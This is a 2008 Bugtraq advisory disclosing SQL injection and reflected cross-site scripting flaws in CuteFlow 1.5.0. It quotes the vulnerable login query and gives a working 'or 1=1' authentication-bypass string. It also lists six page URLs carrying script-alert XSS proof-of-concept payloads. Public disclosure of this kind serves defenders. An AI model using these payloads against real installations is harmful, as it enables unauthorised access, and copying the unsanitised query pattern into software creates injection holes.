[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080329142116.2174.qmail@securityfocus.com>
Date: 29 Mar 2008 14:21:16 -0000
From: hadihadi_zedehal_2006@...oo.com
To: bugtraq@...urityfocus.com
Subject: CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities
########################################################################
# #
# CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities #
# [sql injection & Xss] #
########################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
--------
Discoverd By : hadihadi
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all iranian hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
sql vuln code in login.php:
$query = "select * from cf_user where strPassword = '$strMd5Password' AND strUserId = '".$_REQUEST["UserId"]."'";
-----------------------
the login forme included in index.php you must login in index.php ;)
vuln:
login:admin ' or 1=1/*
password:whatever
-------------------------------------
and you can see xss vuln too here:
/page/showcirculation.php?language=<script>alert(1111)</script>
/pages/edittemplate_step2.php?language=<script>alert(1111)</script>
/pages/showfields.php?language=<script>alert(1111)</script>>
/pages/showuser.php?language=<script>alert(1111)</script>
/pages/editmailinglist_step1.php?language=<script>alert(222)</script>
/pages/showtemplates.php?language=<script>alert(1111)</script>
-------------------------
tnx all h4ck3rz
Powered by blists - more mailing lists